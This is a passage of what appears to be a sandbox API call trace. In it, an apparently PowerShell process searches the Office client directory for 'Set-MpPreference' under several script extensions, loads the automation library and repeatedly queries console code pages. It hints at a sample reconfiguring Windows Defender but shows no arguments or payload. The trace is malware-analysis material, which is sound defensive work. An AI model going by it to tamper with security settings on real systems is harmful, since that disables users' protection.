Office\\root\\Client", nBufferLength=0x105, lpBuffer=0x601ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\root\\Client", lpFilePart=0x0) returned 0x2d [0156.930] GetLastError () returned 0x2 [0156.930] SetErrorMode (uMode=0x1) returned 0x1 [0156.930] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Client\\Set-MpPreference.VBS", lpFindFileData=0x55fe10 | out: lpFindFileData=0x55fe10) returned 0xffffffff [0156.932] GetLastError () returned 0x2 [0156.932] SetErrorMode (uMode=0x1) returned 0x1 [0156.932] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Client", nBufferLength=0x105, lpBuffer=0x601ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\root\\Client", lpFilePart=0x0) returned 0x2d [0156.932] GetLastError () returned 0x2 [0156.932] SetErrorMode (uMode=0x1) returned 0x1 [0156.932] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Client\\Set-MpPreference.VBE", lpFindFileData=0x55fe10 | out: lpFindFileData=0x55fe10) returned 0xffffffff [0156.933] GetLastError () returned 0x2 [0156.934] SetErrorMode (uMode=0x1) returned 0x1 [0156.934] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Client", nBufferLength=0x105, lpBuffer=0x601ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\root\\Client", lpFilePart=0x0) returned 0x2d [0156.934] GetLastError () returned 0x2 [0156.934] SetErrorMode (uMode=0x1) returned 0x1 [0156.934] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Client\\Set-MpPreference.JS", lpFindFileData=0x55fe10 | out: lpFindFileData=0x55fe10) returned 0xffffffff [0156.935] GetLastError () returned 0x2 [0156.936] SetErrorMode (uMode=0x1) returned 0x1 [0156.936] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Client", nBufferLength=0x105, lpBuffer=0x601ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\root\\Client", lpFilePart=0x0) returned 0x2d [0156.936] GetLastError () returned 0x2 [0156.936] SetErrorMode (uMode=0x1) returned 0x1 [0156.936] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Client\\Set-MpPreference.JSE", lpFindFileData=0x55fe10 | out: lpFindFileData=0x55fe10) returned 0xffffffff [0156.937] GetLastError () returned 0x2 [0156.938] SetErrorMode (uMode=0x1) returned 0x1 [0156.938] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Client", nBufferLength=0x105, lpBuffer=0x601ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\root\\Client", lpFilePart=0x0) returned 0x2d [0156.938] GetLastError () returned 0x2 [0156.938] SetErrorMode (uMode=0x1) returned 0x1 [0156.938] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Client\\Set-MpPreference.WSF", lpFindFileData=0x55fe10 | out: lpFindFileData=0x55fe10) returned 0xffffffff [0156.939] GetLastError () returned 0x2 [0156.939] SetErrorMode (uMode=0x1) returned 0x1 [0156.940] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Client", nBufferLength=0x105, lpBuffer=0x601ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\root\\Client", lpFilePart=0x0) returned 0x2d [0156.940] GetLastError () returned 0x2 [0156.940] SetErrorMode (uMode=0x1) returned 0x1 [0156.940] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Client\\Set-MpPreference.WSH", lpFindFileData=0x55fe10 | out: lpFindFileData=0x55fe10) returned 0xffffffff [0156.941] GetLastError () returned 0x2 [0156.941] SetErrorMode (uMode=0x1) returned 0x1 [0156.942] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Client", nBufferLength=0x105, lpBuffer=0x601ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\root\\Client", lpFilePart=0x0) returned 0x2d [0156.942] GetLastError () returned 0x2 [0156.942] SetErrorMode (uMode=0x1) returned 0x1 [0156.942] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Client\\Set-MpPreference.MSC", lpFindFileData=0x55fe10 | out: lpFindFileData=0x55fe10) returned 0xffffffff [0156.943] GetLastError () returned 0x2 [0156.943] SetErrorMode (uMode=0x1) returned 0x1 [0156.943] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Client", nBufferLength=0x105, lpBuffer=0x601ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\root\\Client", lpFilePart=0x0) returned 0x2d [0156.943] GetLastError () returned 0x2 [0156.943] SetErrorMode (uMode=0x1) returned 0x1 [0156.944] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Client\\Set-MpPreference", lpFindFileData=0x55fe10 | out: lpFindFileData=0x55fe10) returned 0xffffffff [0156.945] GetLastError () returned 0x2 [0156.945] SetErrorMode (uMode=0x1) returned 0x1 [0156.950] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x55fc18, nSize=0x80 | out: lpBuffer="") returned 0x0 [0156.950] GetLastError () returned 0xcb [0156.951] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x601ed1c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0156.951] GetLastError () returned 0x2 [0156.952] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x601eccc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0156.952] GetLastError () returned 0x2 [0156.952] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x601eccc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0156.952] GetLastError () returned 0x2 [0156.952] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x601eccc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0156.952] GetLastError () returned 0x2 [0157.107] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x55fcf0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0157.107] GetLastError () returned 0xcb [0157.533] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x55fcf0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0157.533] GetLastError () returned 0xcb [0157.555] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x55fcf0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0157.555] GetLastError () returned 0xcb [0157.599] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x55fcf0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0157.599] GetLastError () returned 0xcb [0157.636] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x55fcf0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0157.636] GetLastError () returned 0xcb [0157.637] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x55fcf0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0157.637] GetLastError () returned 0xcb [0157.654] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x55fcf0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0157.654] GetLastError () returned 0xcb [0158.041] VirtualQuery (in: lpAddress=0x601dd1c, lpBuffer=0x601ed1c, dwLength=0x1c | out: lpBuffer=0x601ed1c*(BaseAddress=0x601d000, AllocationBase=0x5690000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0158.127] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x55fcf0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0158.127] GetLastError () returned 0xcb [0158.476] VirtualQuery (in: lpAddress=0x601dd1c, lpBuffer=0x601ed1c, dwLength=0x1c | out: lpBuffer=0x601ed1c*(BaseAddress=0x601d000, AllocationBase=0x5690000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0158.500] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x601e350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0158.500] GetLastError () returned 0xcb [0158.500] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x601e300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0158.500] GetLastError () returned 0xcb [0158.500] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x601e300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0158.500] GetLastError () returned 0xcb [0158.500] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x601e300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0158.500] GetLastError () returned 0xcb [0158.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x601e350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0158.579] GetLastError () returned 0xcb [0158.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x601e300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0158.579] GetLastError () returned 0xcb [0158.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x601e300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0158.579] GetLastError () returned 0xcb [0159.642] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf [0159.661] GetLastError () returned 0xcb [0159.661] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x601e860 | out: lpConsoleScreenBufferInfo=0x601e860) returned 1 [0159.661] GetLastError () returned 0xcb [0159.695] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x55fcf0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0159.695] GetLastError () returned 0xcb [0159.713] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x601e360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0159.713] GetLastError () returned 0xcb [0159.713] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x601e360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0159.713] GetLastError () returned 0xcb [0159.713] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x601e360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0159.713] GetLastError () returned 0xcb [0159.904] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x55fcf0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0159.904] GetLastError () returned 0xcb [0160.165] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13 [0160.165] GetLastError () returned 0xcb [0160.166] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x601ef74 | out: lpConsoleScreenBufferInfo=0x601ef74) returned 1 [0160.166] GetLastError () returned 0xcb [0160.181] GetConsoleOutputCP () returned 0x1b5 [0160.185] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eed0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eed0) returned 0 [0160.185] GetLastError () returned 0xcb [0160.185] GetConsoleOutputCP () returned 0x1b5 [0160.188] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eed0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eed0) returned 0 [0160.188] GetLastError () returned 0xcb [0160.188] GetConsoleOutputCP () returned 0x1b5 [0160.189] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.189] GetLastError () returned 0xcb [0160.189] GetConsoleOutputCP () returned 0x1b5 [0160.189] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.189] GetLastError () returned 0xcb [0160.189] GetConsoleOutputCP () returned 0x1b5 [0160.189] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.190] GetLastError () returned 0xcb [0160.190] GetConsoleOutputCP () returned 0x1b5 [0160.190] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.190] GetLastError () returned 0xcb [0160.190] GetConsoleOutputCP () returned 0x1b5 [0160.190] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.190] GetLastError () returned 0xcb [0160.190] GetConsoleOutputCP () returned 0x1b5 [0160.191] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.191] GetLastError () returned 0xcb [0160.191] GetConsoleOutputCP () returned 0x1b5 [0160.191] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.191] GetLastError () returned 0xcb [0160.191] GetConsoleOutputCP () returned 0x1b5 [0160.191] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.191] GetLastError () returned 0xcb [0160.191] GetConsoleOutputCP () returned 0x1b5 [0160.192] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.192] GetLastError () returned 0xcb [0160.192] GetConsoleOutputCP () returned 0x1b5 [0160.192] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.192] GetLastError () returned 0xcb [0160.192] GetConsoleOutputCP () returned 0x1b5 [0160.192] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.192] GetLastError () returned 0xcb [0160.192] GetConsoleOutputCP () returned 0x1b5 [0160.193] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.193] GetLastError () returned 0xcb [0160.193] GetConsoleOutputCP () returned 0x1b5 [0160.193] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.193] GetLastError () returned 0xcb [0160.193] GetConsoleOutputCP () returned 0x1b5 [0160.193] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.193] GetLastError () returned 0xcb [0160.193] GetConsoleOutputCP () returned 0x1b5 [0160.194] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.194] GetLastError () returned 0xcb [0160.194] GetConsoleOutputCP () returned 0x1b5 [0160.194] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.194] GetLastError () returned 0xcb [0160.194] GetConsoleOutputCP () returned 0x1b5 [0160.194] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.194] GetLastError () returned 0xcb [0160.194] GetConsoleOutputCP () returned 0x1b5 [0160.195] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.195] GetLastError () returned 0xcb [0160.195] GetConsoleOutputCP () returned 0x1b5 [0160.195] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.195] GetLastError () returned 0xcb [0160.195] GetConsoleOutputCP () returned 0x1b5 [0160.195] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.195] GetLastError () returned 0xcb [0160.195] GetConsoleOutputCP () returned 0x1b5 [0160.196] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.196] GetLastError () returned 0xcb [0160.196] GetConsoleOutputCP () returned 0x1b5 [0160.196] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.196] GetLastError () returned 0xcb [0160.196] GetConsoleOutputCP () returned 0x1b5 [0160.196] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.196] GetLastError () returned 0xcb [0160.196] GetConsoleOutputCP () returned 0x1b5 [0160.197] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.197] GetLastError () returned 0xcb [0160.197] GetConsoleOutputCP () returned 0x1b5 [0160.197] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.197] GetLastError () returned 0xcb [0160.197] GetConsoleOutputCP () returned 0x1b5 [0160.197] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.197] GetLastError () returned 0xcb [0160.197] GetConsoleOutputCP () returned 0x1b5 [0160.198] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.198] GetLastError () returned 0xcb [0160.198] GetConsoleOutputCP () returned 0x1b5 [0160.198] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.198] GetLastError () returned 0xcb [0160.198] GetConsoleOutputCP () returned 0x1b5 [0160.198] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.198] GetLastError () returned 0xcb [0160.198] GetConsoleOutputCP () returned 0x1b5 [0160.199] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.199] GetLastError () returned 0xcb [0160.199] GetConsoleOutputCP () returned 0x1b5 [0160.199] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.199] GetLastError () returned 0xcb [0160.199] GetConsoleOutputCP () returned 0x1b5 [0160.199] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.199] GetLastError () returned 0xcb [0160.199] GetConsoleOutputCP () returned 0x1b5 [0160.200] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.200] GetLastError () returned 0xcb [0160.200] GetConsoleOutputCP () returned 0x1b5 [0160.200] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.200] GetLastError () returned 0xcb [0160.200] GetConsoleOutputCP () returned 0x1b5 [0160.200] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.200] GetLastError () returned 0xcb [0160.200] GetConsoleOutputCP () returned 0x1b5 [0160.201] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.201] GetLastError () returned 0xcb [0160.201] GetConsoleOutputCP () returned 0x1b5 [0160.201] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.201] GetLastError () returned 0xcb [0160.201] GetConsoleOutputCP () returned 0x1b5 [0160.201] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.201] GetLastError () returned 0xcb [0160.201] GetConsoleOutputCP () returned 0x1b5 [0160.232] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.232] GetLastError () returned 0xcb [0160.232] GetConsoleOutputCP () returned 0x1b5 [0160.232] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.232] GetLastError () returned 0xcb [0160.232] GetConsoleOutputCP () returned 0x1b5 [0160.232] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.233] GetLastError () returned 0xcb [0160.233] GetConsoleOutputCP () returned 0x1b5 [0160.233] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.233] GetLastError () returned 0xcb [0160.233] GetConsoleOutputCP () returned 0x1b5 [0160.233] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.233] GetLastError () returned 0xcb [0160.233] GetConsoleOutputCP () returned 0x1b5 [0160.233] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.233] GetLastError () returned 0xcb [0160.233] GetConsoleOutputCP () returned 0x1b5 [0160.233] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.233] GetLastError () returned 0xcb [0160.233] GetConsoleOutputCP () returned 0x1b5 [0160.233] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.233] GetLastError () returned 0xcb [0160.233] GetConsoleOutputCP () returned 0x1b5 [0160.233] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.234] GetLastError () returned 0xcb [0160.234] GetConsoleOutputCP () returned 0x1b5 [0160.234] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.234] GetLastError () returned 0xcb [0160.234] GetConsoleOutputCP () returned 0x1b5 [0160.234] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.234] GetLastError () returned 0xcb [0160.234] GetConsoleOutputCP () returned 0x1b5 [0160.234] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.234] GetLastError () returned 0xcb [0160.234] GetConsoleOutputCP () returned 0x1b5 [0160.234] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.234] GetLastError () returned 0xcb [0160.234] GetConsoleOutputCP () returned 0x1b5 [0160.234] TranslateCharsetInfo (in: 